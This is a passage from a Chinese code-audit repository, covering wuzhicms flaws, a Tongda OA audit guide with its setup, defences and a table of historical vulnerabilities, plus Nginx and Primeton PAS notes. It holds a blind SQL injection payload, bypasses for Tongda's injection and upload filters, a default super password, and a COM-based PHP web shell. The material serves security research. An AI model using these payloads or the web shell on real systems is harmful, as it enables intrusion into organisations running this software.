243 | 前台的sql注入相对简单，漏洞定位`www/api/sms_check.php`，代码如下，接收param参数，直接拼接到了sql语句中。同样用payload`param=1' AND (SELECT 8798 FROM (SELECT(SLEEP(5)))BAkg)-- DIyd
244 | `即可盲注
245 | ```php
246 | $code = strip_tags($GLOBALS['param']);
247 | $posttime = SYS_TIME-300;//5分钟内有效
248 | $db = load_class('db');
249 | $r = $db->get_one('sms_checkcode',"`code`='$code' AND `posttime`>$posttime",'*',0,'id DESC');
250 | ```
251 | 
252 | ### 任意文件删除漏洞
253 | 
254 | 漏洞定位`coreframe/app/attachment/admin/index.php`的del方法，用来删除附件，获取要删除的附件的ID或URL，检查是否存在。代码如下
255 | ```php
256 | public function del()
257 | {
258 |   $id = isset($GLOBALS['id']) ? $GLOBALS['id'] : '';
259 |   $url = isset($GLOBALS['url']) ? remove_xss($GLOBALS['url']) : '';
260 |   if (!$id && !$url) MSG(L('operation_failure'), HTTP_REFERER, 3000);
261 |   if ($id) {
262 |     ...
263 |   }
264 |   else {
265 |     if (!$url) MSG('url del ' . L('operation_failure'), HTTP_REFERER, 3000);
266 |     $path = str_ireplace(ATTACHMENT_URL, '', $url);
267 |     if ($path) {
268 |       $where = array('path' => $path);
269 |       $att_info = $this->db->get_one('attachment', $where, 'usertimes,id'); // 从path中查询该附件
270 | 
271 |       if (empty($att_info)) {
272 |         $this->my_unlink(ATTACHMENT_ROOT . $path); // 如果查询结果为空，删除该路径下的附件
273 |         MSG(L('operation_success'), HTTP_REFERER, 3000);
274 |       }
275 |      ...
276 |   }
277 | }
278 | ```
279 | 如果sql查询结果为空，直接删除该路径下的$path，$path的值是通过url传入的，并且只是对xss进行了过滤，并没有过滤`../`，可以直接跨目录删除任意文件
280 | 
281 | ### SSRF漏洞
282 | 漏洞定位`coreframe/app/search/admin/config.php`的test方法，调用了SSRF常用的`@fsockopen`。
283 | 
284 | ```php
285 |     public function test() {
286 |         $sphinxhost   = remove_xss($GLOBALS['sphinxhost']);
287 |         $sphinxport   = remove_xss($GLOBALS['sphinxport']);
288 | 
289 |         $sphinxhost = !empty($sphinxhost) ? $sphinxhost : exit('-1');
290 |         $sphinxport = !empty($sphinxport) ? intval($sphinxport) : exit('-2');
291 |         $fp = @fsockopen($sphinxhost, $sphinxport, $errno, $errstr , 2);
292 |         if (!$fp) {
293 |             exit($errno.':'.$errstr);
294 |         } else {
295 |             exit('1');
296 |         }
297 |     }
298 | ```
299 | 
300 | ### 目录遍历漏洞
301 | 漏洞定位`coreframe/app/template/admin/index.php`的listing函数
302 | 
303 | ```php
304 |     public function listing() {
305 |         $dir = $this->dir;
306 |         $lists = glob(TPL_ROOT.$dir.'/'.'*');
307 | 
308 |         //if(!empty($lists)) rsort($lists);
309 |         $cur_dir = str_replace(array( COREFRAME_ROOT ,DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR), array('',DIRECTORY_SEPARATOR), TPL_ROOT.$dir.'/');
310 |         $show_dialog = 1;
311 |         include $this->template('listing');
312 |     }
313 | ```
314 | 
315 | `$this->template`加载listing模板，即`coreframe/app/template/admin/template/listing.tpl.php`
316 | 
317 | `.tpl.php`是一个模板文件，用来渲染显示页面，`<?php echo link_url( array('dir'=>stripslashes(dirname($dir))) );?>`生成要遍历的地址，`stripslashes()`会删除反斜杠。但是传入`.....///`会被处理成`..`来绕过有效性检查。
318 | 


--------------------------------------------------------------------------------
/Other_OA/通达OA.md:
--------------------------------------------------------------------------------
  1 | # 通达OA
  2 | 
  3 | ## 环境配置
  4 | 
  5 | ### 下载安装
  6 | 
  7 | v12版：https://cdndown.tongda2000.com/oa/2022/TDOA12.0.exe
  8 | 
  9 | v11版（11.2-11.10）：TDOA+版本名.exe。比如下载11.9本，则名为`TDOA11.9.exe`，对应的下载链接为：https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe
 10 | 
 11 | 2013-2017版：旧版本，MYOA+年份.exe。比如下载2015版本，则名为`/oa/2015/MYOA2015.exe`，对应的下载链接为：https://cdndown.tongda2000.com/oa/2017/MYOA2017.exe
 12 | 
 13 | 环境安装为一体安装包，直接双击点exe，设定完安装目录安装（例如C:\TongDa）即可自动安装。源码在web根目录（webroot）。代码同样是使用php Zend 5.x进行加密的，所以可以使用SeayDzend工具或者百度php zend解密在线网站进行解密。
 14 | 
 15 | 版本查询
 16 | ```
 17 | inc/expired.php
 18 | inc/version.inc.php
 19 | inc/reg_trial.php
 20 | inc/reg_trial_submit.php
 21 | ```
 22 | 
 23 | ### 账户密码 
 24 | ```
 25 | # 后台账户
 26 | admin 密码默认为空 (不会强制修改密码；密码限制长度8-20位，必须同时包含字母和数字)
 27 | 
 28 | # 扩展用户
 29 | officeTask 默认密码为空
 30 | 
 31 | # 服务账户
 32 | 查看\bin\Service.ini文件
 33 | 
 34 | # 默认超级密码
 35 | v11版: 空
 36 | 2013-2017版: t.KNnZ13xCrRI
 37 | ```
 38 | 
 39 | 
 40 | ### 补丁
 41 | 
 42 | 补丁分为日常离线补丁包和紧急补丁包，后者在出了新版本之后不再上架。下载链接如下。XXX为各系列、版本发布年份。例如v11系列最早发布于2019年，即修改为patch2019.php或p2019patch.php。紧急补丁和离线补丁包的区别在于：打了紧急补丁的系统，版本号不会改变，且只存在于每个大版本之间。
 43 | 
 44 | 离线补丁包：https://www.tongda2000.com/download/pXXXpatch.php
 45 | 
 46 | 紧急补丁：https://www.tongda2000.com/download/patchXXX.php
 47 | 
 48 | ## 架构分析
 49 | ### 路由特点
 50 | 通达OA采用了yii2框架，并加入自主开发的系统。安装目录如下，官方文档中声明了`/webroot/general/`是主要功能模块，子文件夹appbuilder就是用的yii框架。但其他功能没有在yii框架范围内。所以路由分为（1）文件到根目录的相对路径 （2）yii框架对应的`/general/appbuilder/web/模块名/控制器名/方法名`
 51 | ```
 52 | ｜—attach （存放附件）
 53 | ｜—bin （PHP、Zeng等配置）
 54 | ｜—data5 （mysql数据库文件）
 55 | ｜—logs （日志文件）
 56 | ｜—MyAdmin （mysql管理工具）
 57 | ｜—mysql5 （mysql主程序文件）
 58 | ｜—nginx （Nginx Web应用服务）
 59 | ｜—tmp （临时文件）
 60 | ｜—webroot （Web根目录）
 61 |     ｜—general 主要模块
 62 |         ｜—appbuilder yii框架
 63 |         ｜—system 系统功能模块
 64 |     ｜—inc 系统通用程序及函数目录
 65 |     ｜—ispirit OA精灵页面
 66 |     ｜—mobile OA移动界面
 67 |     ｜—module 系统组件
 68 |     ｜—portal 门户界面
 69 | ```
 70 | 
 71 | 查看`/general/appbuilder/config/web.php`，即yii的路由配置。可以看到（1）开启了美化路由，并且设置不显示index.php，但是没设置美化规则
 72 | ```php
 73 | "urlManager"   => array(
 74 | 	"enablePrettyUrl" => true,
 75 | 	"showScriptName"  => false,
 76 | 	"rules"           => array()
 77 | 	),
 78 | ```
 79 | yii框架的url通过参数r标识请求的module（模块），controller（控制器），action（方法）的部分，如`http://ip/index.php?r=post/view&id=1`，表示请求由`PostController`的`actionView`来处理。而yii的美化路由功能`enablePrettyUrl`设为true时，会将其变为`http://ip/index.php/post/view/1`。`showScriptName`设为false则会在此基础上隐藏index.php，即`http://ip/post/view/1`。结合通达yii框架入口文件index.php所在位置`/general/appbuilder/web/index.php`，通达yii框架的访问路由即为`/general/appbuilder/web/module/controller/action`。
 80 | 
 81 |    
 82 | **未授权模块筛选**
 83 | `/general/appbuilder/config/params.php`文件中定义了`check_module`和`skip_module`。即需要校验和不需要校验权限的模块。将$b_dir_priv直接设置为true部分可以免登录直接访问。
 84 | ```php
 85 | "check_module"  => array("appcenter", "report", "appdesign"),
 86 | "skip_module"   => array("portal", "hr", "meeting", "formCenter", "calendar", "officeproduct", "invoice"),
 87 | ```
 88 | 另外，可以查找不包含权限校验文件的（如下），优先进行代码审计
 89 | ```
 90 | pda/auth.php
 91 | pda/pad/auth.php
 92 | task/auth.php
 93 | mobile/auth_mobi.php
 94 | mobile/auth.php
 95 | general/data_center/utils/task_auth.php
 96 | general/reportshop/utils/task_auth.php
 97 | interface/auth.php
 98 | ispirit/im/auth.php
 99 | ```
100 | 
101 | ### 安全策略
102 | 
103 | #### (1) sql注入防护
104 | 
105 | 引用的80sec的sql注入通用ids防御程序，位于`/inc/conn.php`的`sql_injection`方法。然后在不同版本中进行了不同程度的修改，展开可以查看11.10版本的。
106 | 
107 | <details>
108 | 	<summary>sql_injection 11.10版本</summary>
109 | 	<pre>
110 | 	<code>
111 | function sql_injection($db_string)
112 | {
113 | 	$clean = "";
114 | 	$error = "";
115 | 	$old_pos = 0;
116 | 	$pos = -1;
117 | 	$db_string = str_replace(array("''", "\'"), "", $db_string);
118 | 	$db_string = preg_replace("/`[^,=\(\)]*'[^,=\(\)]*`/", "", $db_string);
119 | 	while (true) { //绕过思路1:两个单引号之间的内容替换成\$s\$
120 | 		$pos = strpos($db_string, "'", $pos + 1);
121 | 		if ($pos === false) {
122 | 			break;
123 | 		}
124 | 		$clean .= substr($db_string, $old_pos, $pos - $old_pos);
125 | 		while (true) {
126 | 			$pos1 = strpos($db_string, "'", $pos + 1);
127 | 			$pos2 = strpos($db_string, "\\", $pos + 1);
128 | 			if ($pos1 === false) {
129 | 				break;
130 | 			}
131 | 			else {
132 | 				if (($pos2 == false) || ($pos1 < $pos2)) {
133 | 					$pos = $pos1;
134 | 					break;
135 | 				}
136 | 			}
137 | 			$pos = $pos2 + 1;
138 | 		}
139 | 		$clean .= "\$s\$";
140 | 		$old_pos = $pos + 1;
141 | 	}
142 | 	$clean .= substr($db_string, $old_pos);
143 | 	$clean = trim(strtolower(preg_replace(array("/\s+/s"), array(" "), $clean)));
144 | 	$fail = false;
145 | 	$matches = array();
146 | 	if ((2 < strpos($clean, "/*")) || (strpos($clean, "--") !== false) || (strpos($clean, "#") !== false)) {
147 | 		$fail = true;
148 | 		$error = _("注释代码");
149 | 	}
150 | 	else if (preg_match("/(^|[^a-z])union(\s+[a-z]*)*\s+select($|[^[a-z])/s", $clean) != 0) {
151 | 		$fail = true;
152 | 		$error = _("联合查询");
153 | 	}
154 | 	else if (preg_match("/(^|[^a-z])(sleep|benchmark|load_file|mid|ord|ascii|extractvalue|updatexml|exp|current_user)\s*\(/s", $clean, $matches) != 0) 	   {
155 | 		$fail = true;
156 | 		$error = $matches[2];
157 | 	}
158 | 	else if (preg_match("/(^|[^a-z])into\s+outfile($|[^[a-z])/s", $clean) != 0) {
159 | 		$fail = true;
160 | 		$error = _("生成文件");
161 | 	}
162 | 	else if (preg_match("/.*update.+user.+set.+file_priv.*/s", $clean) != 0) {
163 | 		$fail = true;
164 | 		$error = "set file_priv";
165 | 	}
166 | 	else if (preg_match("/.*set.+general_log.*/s", $clean) != 0) {
167 | 		$fail = true;
168 | 		$error = "general_log";
169 | 	}
170 | 	if ($fail) {
171 | 		echo _("不安全的SQL语句：") . $error . "<br />";
172 | 		echo td_htmlspecialchars($db_string);
173 | 		exit();
174 | 	}
175 | }
176 | 	</code>
177 | 	</pre>
178 | </details>
179 | 
180 | 上述防御会将两个单引号之间的内容替换成\$s\$，然后拼接到$clean进行处理，判断clean中是否包含联合注入、注释代码的关键字。所以绕过方式整体分为三种（1）单引号绕过 （2）盲注绕过 （3）编码绕过
181 | ```
182 | # 单引号绕过
183 | (1) @+反引号包裹。如@\`'\`，此时该值为null。如果是sql表不允许某个字段为null，规避这个情况需要通过来char(@\`'\`)绕过。11.9以下版本可用
184 | (2) 两个@符号包裹。如 @'@
185 | (3) 双引号包裹。如 "'"
186 | (4) 反引号拼接。如 `'`.``.后续sql语句。以TD_OA数据库user表为例，表结构中字段user_name为中文账户名，user_id为用户名，uid为用户id编号。
187 | 如 select * from user where user_name='a' and `'`.``.uid or if(substr((select user_id from user where uid = 1),1,1)='a',sleep(5),0)#';
188 | 此sql语句优先级等同： select * from user where user_name='a' and (`'`.``.uid or (if(substr((select user_id from user where uid = 1),1,1)='a',sleep(5),0)))#';
189 | 
190 | # 盲注绕过
191 | 在11.9版本的通达中已经对常见绕过方式进行了修复，首先会把所有转义之后的引号替换为空，然后再把反引号中的引号替换为空（见代码注释）。但是没有处理盲注，其中延时注入可以通过笛卡尔注入方式，逻辑盲注也没有过滤（根据页面情况响应来判断）
192 | 
193 | # 编码绕过
194 | hex编码和url编码等。如select * from user where id = 1 and (select name from by_user where uid=1) like 0x25
195 | ```
196 | 
197 | #### (2) 文件上传防护
198 | 
199 | 位于`inc/utility_file.php`的`is_uploadable`方法是针对上传文件的检测函数，展开查看11.10版本的代码
200 | 
201 | <details>
202 | 	<summary>is_uploadable 11.10版本</summary>
203 | 	<pre>
204 | 	<code>
205 | function is_uploadable($FILE_NAME)
206 | {
207 | 	$POS = strrpos($FILE_NAME, ".");
208 | 	if ($POS === false) {
209 | 		$EXT_NAME = $FILE_NAME;
210 | 	}
211 | 	else {
212 | 		if ((strtolower(substr($FILE_NAME, $POS + 1, 3)) == "") || (strtolower(substr($FILE_NAME, $POS + 1, 3)) == "php")) {
213 | 			return false;
214 | 		}
215 | 		$EXT_NAME = strtolower(substr($FILE_NAME, $POS + 1));
216 | 	}
217 | 	if (find_id(MYOA_UPLOAD_FORBIDDEN_TYPE, $EXT_NAME)) { // // $UPLOAD_FORBIDDEN_TYPE = "php,php3,php4,php5,phpt,jsp,asp,aspx,";
218 | 		return false;
219 | 	}
220 | 	if (MYOA_UPLOAD_LIMIT == 0) {
221 | 		return true;
222 | 	}
223 | 	else if (MYOA_UPLOAD_LIMIT == 1) {
224 | 		return !find_id(MYOA_UPLOAD_LIMIT_TYPE, $EXT_NAME);
225 | 	}
226 | 	else if (MYOA_UPLOAD_LIMIT == 2) {
227 | 		return find_id(MYOA_UPLOAD_LIMIT_TYPE, $EXT_NAME); // $UPLOAD_LIMIT_TYPE = "php,php3,php4,php5,";
228 | 	}
229 | 	else {
230 | 		return false;
231 | 	}
232 | }
233 | 	</code>
234 | 	</pre>
235 | </details>
236 | 
237 | 防护对文件名末尾的`.`截取进行检测，只要不是以`.php`、`.php3`等结尾即可绕过。
238 | ```
239 | (1) 点绕过。即a.php.
240 | (2) ascii编码绕过。0x88
241 | (3) 包含指定目录的文件（vuln-history sql注入修改文件路径进行包含的漏洞）
242 | ```
243 | 另外，由于nginx的nginx.conf配置文件设定对上传目录attachment等目录下的文件不具备执行权限，也就是需要目录穿越到其他目录下才能执行php文件
244 | ```
245 | location ~* ^/(attachment|static|images|theme|templates|wav|mysql|resque|task)/.*\.(php|.php3|.php5|jsp|asp)$ {
246 |     deny all;
247 | }
248 | ```
249 | 
250 | #### (3) 危险函数限制
251 | 通达的php.ini中设置了disable_function，不同版本下的php配置不同，所以disable_function也有一些区别。v11.10限制了大部分危险函数，一句话木马写shell受限，但没限制的可执行函数：`assert`（不能通过这个一句话来执行系统命令）。2015版基本没有限制eval函数
252 | ```ini
253 | # 11.10
254 | disable_functions = exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg
255 | 
256 | # 2015 未限制eval
257 | disable_functions = exec,shell_exec,system,passthru,proc_open,show_source,phpinfo
258 | ```
259 | 绕过方式除了在11.10中用assert、2015中用eval函数这种黑名单绕过方式，还可以 (1) Windows系统组件COM上传图片马 (2) mysql udf提权。Windows系统组件COM上传图片马的条件：a.
260 | `com.allow_dcom = true`（默认不开启） b. 开启`php_com_dotnet.dll` c. php>5.4。利用代码如下，但在11.9版本已经不支持这种方式。mysql udf提权的条件是：a. mysql可远程登录；b.CREATE权限、FILE权限（root用户默认拥有所有权限）；c.  `secure_file_priv`项设置为空（不是null）:
261 | 
262 | **Windows系统组件COM上传图片马**
263 | ```php
264 | <?php
265 |   $command = $_POST['pass'];
266 |   $wsh = new COM('WScript.shell');
267 |   $exec = $wsh->exec("cmd/c".$command);
268 |   $stdout = $exec->StdOut();
269 |   $stroutput = $stdout->ReadAll();
270 |   echo $stroutput;
271 | ```
272 | 
273 | ## 历史漏洞
274 | 
275 | 
276 | |漏洞名称|访问路径|影响版本|
277 | |:---:|:---:|:---:|
278 | |report_bi.func.php sql联合注入漏洞|`/general/bi_design/appcenter/report_bi.func.php`|<=11.6|
279 | |/recv/register/insert sql盲注漏洞|`/general/document/index.php/recv/register/insert`|<=11.6|
280 | |swfupload_new.php 未授权sql盲注漏洞|`/general/file_folder/swfupload_new.php`|<=11.5|
281 | |get_index_data.php sql盲注漏洞|`/general/email/inbox/get_index_data.php`|<=11.7|
282 | |release.php sql盲注漏洞|`/general/crm/studio/modules/EntityRelease/release.php`|2011-2013|
283 | |delete_cascade.php sql任意注入漏洞|`/general/hrms/manage/hrms.php`|<=11.10|
284 | |go.php sql报错注入漏洞|`interface/go.php`|<=11.7|
285 | |use_finger.php sql报错注入漏洞|`/inc/finger/use_finger.php`|<=2014|
286 | |search_excel.php sql报错注入漏洞|`/general/ems/query/search_excel.php`|<=2014|
287 | |record_detail.php sql延时注入漏洞|`/pda/reportshop/record_detail.php`|<=11.6|
288 | |export_data.php sql延时注入漏洞|`/general/system/approve_center/flow_data/export_data.php`|<=11.10|
289 | |RepdetailController.php sql盲注漏洞|`/general/appbuilder/web/report/repdetail/edit`|<=11.5|
290 | |Calendar.php sql盲注漏洞|`/general/appbuilder/web/calendar/calendarlist/getcallist`|<=11.5|
291 | |WorkbenchController.php sql盲注漏洞|`/general/appbuilder/web/calendar/calendarlist/getcallist`|<=11.9|
292 | |applyprobygroup sql延时注入漏洞|`/general/appbuilder/web/officeproduct/productapply/applyprobygroup`|<=11.7|
293 | |finish sql延时注入漏洞|`/general/document/index.php/send/approve/finish`|2015|
294 | |meetingreceipt sql堆叠注入漏洞|`/general/appbuilder/web/meeting/meetingmanagement/meetingreceipt`|<=11.5|
295 | |upload/upload.php 文件上传漏洞|`module/upload/upload.php`|<=11.3|
296 | |utils/upload.php 文件上传漏洞|`general/reportshop/utils/upload.php?action=upload`|2015|
297 | |netdisk/upload.php 文件上传漏洞|`/general/netdisk/upload.php`|<=11.9|
298 | |api.ali.php 文件上传漏洞|`mobile/api/api.ali.php`|<=11.8|
299 | |staff_info/update.php 文件包含漏洞|`general/hr/manage/staff_info/update.php`|<=11.8|
300 | |down.php 未授权数据库备份文件下载漏洞|`/inc/package/down.php`|<=11.8|
301 | |exportLog.php 未授权文件下载漏洞|`/general/approve_center/archive/exportLog.php`|2017旧版以前|
302 | |get_file.php 未授权文件下载漏洞|`/module/AIP/get_file.php`|2017旧版以前|
303 | |export.php 未授权文件下载漏洞|`general/crm/apps/crm/include/import/export.php`|2011|
304 | |action_upload.php 未授权上传漏洞|`/module/ueditor/php/action_upload.php`|ueditor 1.3.6版本|
305 | |print.php 文件删除漏洞|`/module/appbuilder/assets/print.php`|<=11.6|
306 | |im/upload.php 未授权文件上传漏洞|`ispirit/im/upload.php`|<=11.3|
307 | |im/photo.php 任意文件读取漏洞|`/ispirit/im/photo.php `|<=11.7|
308 | |new/submit.php 文件上传漏洞|`/general/file_folder/new/submit.php `|<=11.7|
309 | |/utils/upload.php 文件上传漏洞|`/general/data_center/utils/upload.php`|<=11.6|
310 | |video_file.php 文件下载漏洞|`/general/mytable/intel_view/video_file.php`|——|
311 | |gateway.php 文件包含漏洞|`/ispirit/interface/gateway.php`|<=11.3|
312 | |swfupload.php 未授权文件上传漏洞|`general/file_folder/swfupload.php`|<=11.5|
313 | |second_tabs.php 文件伪造漏洞|`inc/second_tabs.php`|<=11.3|
314 | |report/getdata.php 文件上传漏洞|`mobile/reportshop/report/getdata.php`|<=11.3|
315 | |auth_mobi.php 在线任意用户登录漏洞|`/mobile/auth_mobi.php`|<=11.7|
316 | |logincheck_code.php 任意登录漏洞|`/general/logincheck_code.php`|<=11.5|
317 | |logincheck.php 爆破漏洞|`login.php/logincheck.php`|<=11.10|
318 | |img_download.php SSRF漏洞|`/pda/workflow/img_download.php`|<=11.7|
319 | 
320 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 1. 代码审计
 2 | ### 国产软件
 3 | 
 4 | * [泛微Ecology] [代码审计](Java_OA/EcologyAudit.md)、[安装说明](Java_OA/Ecology9_install.md)
 5 | * [泛微E-Office] [代码审计与环境搭建](Other_OA/%E6%B3%9B%E5%BE%AEE-Office.md)
 6 | * [泛微云桥e-Bridge] [代码审计](https://blog.csdn.net/baidu_25299117/article/details/140979726?spm=1001.2014.3001.5501)
 7 | * [致远Seeyon] [代码审计](Java_OA/SeeyonAudit.md)、[补丁问题](Java_OA/Seeyon_clazzDecompile.md)
 8 | * [用友NC] [代码审计与环境搭建](Java_OA/yongyou_NC_Audit.md)
 9 | * [蓝凌Landray] [代码审计与环境搭建](Java_OA/LandrayEkpAudit.md)
10 | * [帆软报表] [代码审计与环境搭建](Java_OA/FineReportAudit.md)
11 | * [拓尔思TRS 内容协作平台WCM] [代码审计与环境搭建](Java_OA/WCM_Audit.md)
12 | * [通达OA] [代码审计与环境搭建](Other_OA/%E9%80%9A%E8%BE%BEOA.md)
13 | * [Smartbi] [代码审计](Java_OA/Smartbi_Audit.md)
14 | * [RuoYi若依] [代码审计](Java_OA/RuoYi.md)
15 | * [金山终端安全系统] [代码审计](Other_OA/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F.md)
16 | * [慧点OA] [代码审计](Java_OA/huidianOA.md)
17 | * [浙大恩特客户资源管理系统] [代码审计](Java_OA/entCRM.md)
18 | * [企望制造ERP] [代码审计](Java_OA/qiwangzhizao.md)
19 | * [畅捷通] [代码审计](Other_OA/Chanjet.md)
20 | * [亿赛通] [代码审计](Java_OA/CDGServer3_old.md)
21 | * [飞企互联FE企业运营管理平台] [代码审计](Java_OA/FEOAv6.51.md)
22 | * [契约锁] [代码审计、补丁破解、License破解](https://blog.csdn.net/baidu_25299117/article/details/139990814?spm=1001.2014.3001.5502)
23 | * [海康威视综合安防管理平台ivms8700] [代码审计](https://blog.csdn.net/baidu_25299117/article/details/140634959?spm=1001.2014.3001.5502)
24 | * [红海ehr] [代码审计](https://blog.csdn.net/baidu_25299117/article/details/140672183?spm=1001.2014.3001.5502)
25 | * [IDocView] [代码审计](https://blog.csdn.net/baidu_25299117/article/details/140750617?spm=1001.2014.3001.5502)
26 | * [通天星CMSV6] [代码审计](https://blog.csdn.net/baidu_25299117/article/details/140690863?spm=1001.2014.3001.5501)
27 | * [禅道] [代码审计](Other_OA/Zentao.md)
28 | 
29 | ### 常见组件
30 | 
31 | * [ThinkPHP] [代码审计](Other_OA/ThinkPHP.md)
32 | * [Struts2] [漏洞环境下载](https://github.com/ax1sX/SecurityList/tree/main/Struts2/demo)、[OGNL POC](Struts2/POC%E8%A7%A3%E6%9E%90.md)、[漏洞分析](Struts2/Struts2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.md)
33 | * [XStream] [审计特点与POC分析](Java_OA/xstream.md)
34 | * [Nexus Repository Manager] [代码审计与环境搭建](Java_OA/Nexus%20Repository%20Manager%20Audit.md)
35 | * [wuzhicms] [代码审计](Other_OA/wuzhicms.md)
36 | * [Nacos] [代码审计](Java_OA/NacosAudit.md)
37 | * [Teamcity] [代码审计](Java_OA/Teamcity_Audit.md)
38 | * [GeoServer] [历史漏洞分析](https://blog.csdn.net/baidu_25299117/article/details/140305513?spm=1001.2014.3001.5502)
39 | * [JeecgBoot] [代码审计](https://blog.csdn.net/baidu_25299117/article/details/140818375?spm=1001.2014.3001.5502)
40 | 
41 | ### 服务器
42 | 
43 | * [Jetty](Server/Jetty.md)
44 | * [Nginx](Server/Nginx.md)
45 | * [Tomcat](Server/Tomcat.md)
46 | * [WebLogic](Server/Weblogic.md)
47 | * [JBoss](Server/Jboss.md)
48 | * [TongWeb](Server/TongWeb.md)
49 | * [PrimetonPAS](Server/PrimetonPASAudit.md)
50 | 
51 | ### 数据库
52 | 
53 | * [mssql](Database/mssql.md)
54 | * [mysql](Database/mysql.md)
55 | * [H2 Database](Database/H2%20Database.md)
56 | * [CouchDB](Database/CouchDB.md)
57 | * [Apache Solr](Database/Apache%20Solr.md)
58 | * [ElasticSearch](Database/ElasticSearch.md)
59 | * [InfluxDB](Database/InfluxDB.md)
60 | * [Apache Druid](Database/Apache%20Druid.md)
61 | 
62 | # 2. 路由分析
63 | * [Struts2框架路由分析](Java_OA/Route_Struts2.md)
64 | * [ThinkPHP框架路由与鉴权分析](Other_OA/Thinkphp框架鉴权分析.md)
65 | 
66 | # 3. 漏洞利用
67 | 
68 | * [Java常见利用类](JavaVulType/%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8%E7%B1%BB.md)
69 | * [表达式注入类漏洞](JavaVulType/Expression.md)
70 | * [XXE类漏洞](JavaVulType/XXE.md)
71 | * [JDBC攻击](JavaVulType/JDBC.md)
72 | 


--------------------------------------------------------------------------------
/Server/Jboss.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Server/Jboss.md


--------------------------------------------------------------------------------
/Server/Nginx.md:
--------------------------------------------------------------------------------
 1 | # Nginx
 2 | 
 3 | Nginx是HTTP和反向代理服务器、邮件代理服务器和通用TCP/UDP代理服务器，由C语言开发
 4 | 
 5 | 官方漏洞列表： http://nginx.org/en/security_advisories.html
 6 | 
 7 | 官方下载地址： https://nginx.org/en/download.html
 8 | 
 9 | Windows下安装，解压zip文件，更改/conf/nginx.conf，找到listen字段更改端口（一般默认的80端口都存在冲突无法启动）。双击nginx.exe启动
10 | ```xml
11 | server {
12 |     listen  8086;
13 | }
14 | ```
15 | 关闭服务
16 | ```
17 | nginx -s stop
18 | nginx -s quit
19 | ```
20 | 
21 | 历史漏洞
22 | |漏洞编号|漏洞类型|影响版本|
23 | |:----:|:----:|:----:|
24 | |CVE-2013-4547|逻辑漏洞|0.8.41-1.5.6|
25 | |CVE-2017-7529|越界读取缓存|0.5.6-1.13.2|
26 | 
27 | ## CVE-2013-4547
28 | Ref： https://blog.werner.wiki/file-resolution-vulnerability-nginx/
29 | 


--------------------------------------------------------------------------------
/Server/PrimetonPASAudit.md:
--------------------------------------------------------------------------------
  1 | # 普元应用服务器(PAS)
  2 | 
  3 | ## 环境安装
  4 | 
  5 | 系统环境为`Ubuntu20.04`
  6 | *   （1）安装JDK8，`sudo apt-get install openjdk-8-jdk`
  7 | *   （2）解压安装文件，进入解压后的目录
  8 | *   （3）赋予`install.sh`和`installer/bin`目录下的sh文件可执行权限，`chmod u+x *.sh`
  9 | *   （3）执行`install.sh`文件并根据引导进行安装
 10 | *   （4）下载[mysql-connector-java-5.1.40.jar](https://mvnrepository.com/artifact/mysql/mysql-connector-java/5.1.40)文件拷贝至安装目录中的`pas6/pas/domains/domain1/lib/`目录下
 11 | *   （5）进入安装目录下的`pas6/`目录,为sh脚步添加可执行权限。
 12 | *   （6）执行`startServer.sh`，启动服务
 13 | *   （7）访问`http://localhost:6888`，使用`admin/manager`进行登陆。
 14 | 
 15 | ## 使用方式
 16 | 
 17 | ### 远程调试
 18 | 以如下方式启动服务，默认端口为`9009`
 19 | 
 20 | ```
 21 | startServer.sh -d
 22 | ```
 23 | 
 24 | ### 应用部署
 25 | 
 26 | 随意构建一个war包，通过管理页面的前台进行部署，如下图
 27 | 
 28 | ![image](https://user-images.githubusercontent.com/62204882/201556701-1e05ef24-ead4-4f28-bbc4-24d3148fd8d8.png)
 29 | 
 30 | 部署后的文件位于pas6/pas/domains/domain1/applications/web目录
 31 | 
 32 | ## 历史漏洞
 33 | 
 34 | * [PAS安全： CNVD-C-2022-122084 Primeton AppServer管理控制台存在弱口令漏洞的修复方法 - 00_信创产品知识库 - 普元技术文档库（官方）](http://doc.primeton.com/pages/viewpage.action?pageId=61902745)
 35 | 
 36 | ## 路由分析
 37 | 
 38 | `web.xml`配置文件中暴露的路由有如下部分
 39 | 
 40 | ### /download/*
 41 | 
 42 | 对应类`com.primeton.appserver.admingui.common.servlet.DownloadServlet`，它有如下初始化参数
 43 | ```xml
 44 | <init-param>
 45 |     <param-name>ContentSources</param-name>
 46 |     <param-value>
 47 |             com.primeton.appserver.admingui.common.servlet.LBConfigContentSource,
 48 |             com.primeton.appserver.admingui.common.servlet.ClientStubsContentSource,
 49 |             com.primeton.appserver.admingui.common.servlet.LogFilesContentSource
 50 |             com.primeton.appserver.admingui.common.servlet.LogViewerContentSource
 51 |     </param-value>
 52 | </init-param>
 53 | <init-param>
 54 |     <param-name>contentSourceId</param-name>
 55 |     <param-value>LBConfig</param-value>
 56 | </init-param>
 57 | ```
 58 | 这4个类都实现了`ContentSource`接口，关注`getInputStream`方法。
 59 | 
 60 | 使用如下路由访问
 61 | ```
 62 | /download/a?contentSourceId=(LBConfig|LogFiles|LogViewer|ClientStubs)
 63 | ```
 64 | 
 65 | 它们会根据指定的参数，内部访问REST接口来获取所需数据，但不能直接进行访问。
 66 | 
 67 | ### /resources/*
 68 | 
 69 | 由javax.faces.webapp.FacesServlet进行处理。
 70 | 
 71 | 有两种方式访问资源
 72 | ```
 73 | /resources/<资源路径>
 74 | /resources/javax.faces.resources/<资源名>?ln<library-name>&loc<locale-prefix>
 75 | ```
 76 | 尝试了目录穿越，但是代码中检查的很严格
 77 | ```java
 78 | # com.sun.faces.application.resource.ResourceManager
 79 | private static boolean nameContainsForbiddenSequence(String name) {
 80 |     boolean result = false;
 81 |     if (name != null) {
 82 |         name = name.toLowerCase();
